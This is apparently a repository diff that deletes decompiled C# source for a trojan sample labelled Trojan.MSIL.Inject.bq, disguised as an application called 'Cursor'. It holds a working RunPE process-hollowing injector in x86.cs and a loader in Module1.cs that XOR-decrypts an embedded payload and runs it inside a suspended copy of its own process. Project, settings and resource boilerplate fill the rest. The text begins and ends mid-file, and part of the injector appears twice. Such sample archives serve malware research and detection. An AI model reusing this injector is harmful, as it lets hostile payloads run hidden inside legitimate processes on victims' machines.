x86.Win32.SetThreadContext(pInfo[1], ctxt);
}
x86.Win32.ResumeThread(pInfo[1]);
}
[SuppressUnmanagedCodeSecurity]
private class Win32
{
[DebuggerNonUserCode]
public Win32()
{
}
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("ntdll")]
public static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
IntPtr bufrSize,
ref IntPtr numRead);
[DllImport("kernel32")]
public static extern int ResumeThread(IntPtr hThr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
public static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool VirtualProtectEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int newProt,
ref int oldProt);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool WriteProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
byte[] buff,
IntPtr size,
ref IntPtr numRead);
}
}
}

13
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d/AssemblyInfo.cs
View File

@ -1,13 +0,0 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCompany("")]
[assembly: AssemblyTitle("Cursor")]
[assembly: AssemblyCopyright("Copyright © 2010")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyDescription("1")]
[assembly: AssemblyProduct("Cursor")]
[assembly: ComVisible(false)]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("728093e4-7457-46be-8e8e-0fdee382cfff")]
[assembly: AssemblyVersion("1.0.0.0")]

54
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d/Module1.cs
View File

@ -1,54 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.Module1
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace Cursor
{
[StandardModule]
internal sealed class Module1
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SizeofResource(IntPtr hModule, IntPtr hResInfo);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
[STAThread]
public static void Main()
{
string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
IntPtr moduleHandle = Module1.GetModuleHandle(ref moduleName);
IntPtr resource = Module1.FindResource(moduleHandle, "69", "GAY");
IntPtr source = Module1.LoadResource(moduleHandle, resource);
int length = Module1.SizeofResource(moduleHandle, resource);
byte[] numArray = new byte[checked (length - 1 + 1)];
Marshal.Copy(source, numArray, 0, length);
int int32 = BitConverter.ToInt32(numArray, checked (numArray.Length - 4));
byte[] bytes = (byte[]) Utils.CopyArray((Array) numArray, (Array) new byte[checked (numArray.Length - 3 + 1)]);
Random random = new Random(int32);
byte[] buffer = new byte[checked (bytes.Length - 1 + 1)];
random.NextBytes(buffer);
int num = checked (bytes.Length - 1);
int index = 0;
while (index <= num)
{
bytes[index] = (byte) ((int) bytes[index] ^ (int) buffer[index]);
checked { ++index; }
}
x86.RunPE(bytes, Process.GetCurrentProcess().MainModule.FileName);
}
}
}

23
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d/My/MyApplication.cs
View File

@ -1,23 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyApplication
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace Cursor.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ConsoleApplicationBase
{
[DebuggerNonUserCode]
public MyApplication()
{
}
}
}

24
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d/My/MyComputer.cs
View File

@ -1,24 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyComputer
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace Cursor.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}

194
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d/My/MyProject.cs
View File

@ -1,194 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MyProject
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace Cursor.My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
[HideModuleName]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}

36
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d/My/MySettings.cs
View File

@ -1,36 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MySettings
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Cursor.My
{
[EditorBrowsable(EditorBrowsableState.Advanced)]
[CompilerGenerated]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
[DebuggerNonUserCode]
public MySettings()
{
}
public static MySettings Default
{
get
{
MySettings defaultInstance = MySettings.defaultInstance;
return defaultInstance;
}
}
}
}

31
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d/My/MySettingsProperty.cs
View File

@ -1,31 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.MySettingsProperty
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Cursor.My
{
[DebuggerNonUserCode]
[HideModuleName]
[StandardModule]
[CompilerGenerated]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings
{
get
{
MySettings settings = MySettings.Default;
return settings;
}
}
}
}

46
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d/My/Resources/Resources.cs
View File

@ -1,46 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.My.Resources.Resources
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Cursor.My.Resources
{
[HideModuleName]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[StandardModule]
[DebuggerNonUserCode]
[CompilerGenerated]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) Cursor.My.Resources.Resources.resourceMan, (object) null))
Cursor.My.Resources.Resources.resourceMan = new ResourceManager("Cursor.Resources", typeof (Cursor.My.Resources.Resources).Assembly);
return Cursor.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Cursor.My.Resources.Resources.resourceCulture;
set => Cursor.My.Resources.Resources.resourceCulture = value;
}
}
}

120
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d/Resources.resx
View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

52
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d/Trojan.MSIL.Inject.bq.csproj
View File

@ -1,52 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{5128957C-93B1-40EE-A44D-33A85084B289}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Cursor</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Cursor</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="x86.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d/Trojan.MSIL.Inject.bq.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Cursor", "Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d.csproj", "{5128957C-93B1-40EE-A44D-33A85084B289}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{5128957C-93B1-40EE-A44D-33A85084B289}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{5128957C-93B1-40EE-A44D-33A85084B289}.Debug|Any CPU.Build.0 = Debug|Any CPU
{5128957C-93B1-40EE-A44D-33A85084B289}.Release|Any CPU.ActiveCfg = Release|Any CPU
{5128957C-93B1-40EE-A44D-33A85084B289}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

170
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d/x86.cs
View File

@ -1,170 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Cursor.x86
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B150258B-E423-436E-A699-590287945A17
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Inject.bq-67613154dd98d80190c687cbae943551822d56427c2fb063c0c7a7e2b640fa5d.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security;
using System.Text;
namespace Cursor
{
public class x86
{
private static readonly int[] prot = new int[8]
{
1,
16,
2,
32,
4,
64,
4,
64
};
[DebuggerNonUserCode]
public x86()
{
}
public static void RunPE(byte[] bytes, string surrogateProcess)
{
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, checked (int32 + 6));
IntPtr size1 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 84)));
byte[] sInfo = new byte[68];
IntPtr[] pInfo = new IntPtr[4];
IntPtr num1;
if (!x86.Win32.CreateProcess((string) null, new StringBuilder(surrogateProcess), num1, num1, false, 4, num1, (string) null, sInfo, pInfo))
return;
uint[] ctxt = new uint[179];
ctxt[0] = 65538U;
IntPtr bufr;
IntPtr numRead;
if (x86.Win32.GetThreadContext(pInfo[1], ctxt) && x86.Win32.ReadProcessMemory(pInfo[0], new IntPtr(checked ((long) ctxt[41] + 8L)), ref bufr, new IntPtr(4), ref numRead) && x86.Win32.NtUnmapViewOfSection(pInfo[0], bufr) == 0U)
{
IntPtr hProc1 = pInfo[0];
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 52)));
IntPtr addr1 = num2;
IntPtr num3 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 80)));
IntPtr size2 = num3;
IntPtr baseAddr1 = x86.Win32.VirtualAllocEx(hProc1, addr1, size2, 12288, 64);
bool flag = x86.Win32.WriteProcessMemory(pInfo[0], baseAddr1, bytes, size1, ref numRead);
int num4 = checked (int16 - 1);
int num5 = 0;
while (num5 <= num4)
{
int[] dst1 = new int[10];
Buffer.BlockCopy((Array) bytes, checked (int32 + 248 + num5 * 40), (Array) dst1, 0, 40);
byte[] dst2 = new byte[checked (dst1[4] - 1 + 1)];
Buffer.BlockCopy((Array) bytes, dst1[5], (Array) dst2, 0, dst2.Length);
IntPtr hProc2 = pInfo[0];
num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
IntPtr baseAddr2 = num3;
byte[] buff = dst2;
num2 = new IntPtr(dst2.Length);
IntPtr size3 = num2;
ref IntPtr local1 = ref numRead;
flag = x86.Win32.WriteProcessMemory(hProc2, baseAddr2, buff, size3, ref local1);
IntPtr hProc3 = pInfo[0];
num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
IntPtr addr2 = num3;
num2 = new IntPtr(dst1[2]);
IntPtr size4 = num2;
int newProt = x86.prot[dst1[9] >> 29 & 7];
int num6;
ref int local2 = ref num6;
flag = x86.Win32.VirtualProtectEx(hProc3, addr2, size4, newProt, ref local2);
checked { ++num5; }
}
IntPtr hProc4 = pInfo[0];
num3 = new IntPtr(checked ((long) ctxt[41] + 8L));
IntPtr baseAddr3 = num3;
byte[] bytes1 = BitConverter.GetBytes(baseAddr1.ToInt32());
num2 = new IntPtr(4);
IntPtr size5 = num2;
ref IntPtr local = ref numRead;
flag = x86.Win32.WriteProcessMemory(hProc4, baseAddr3, bytes1, size5, ref local);
ctxt[44] = checked ((uint) (baseAddr1.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40)));
x86.Win32.SetThreadContext(pInfo[1], ctxt);
}
x86.Win32.ResumeThread(pInfo[1]);
}
[SuppressUnmanagedCodeSecurity]
private class Win32
{
[DebuggerNonUserCode]
public Win32()
{
}
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("ntdll")]
public static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
IntPtr bufrSize,
ref IntPtr numRead);
[DllImport("kernel32")]
public static extern int ResumeThread(IntPtr hThr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
public static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
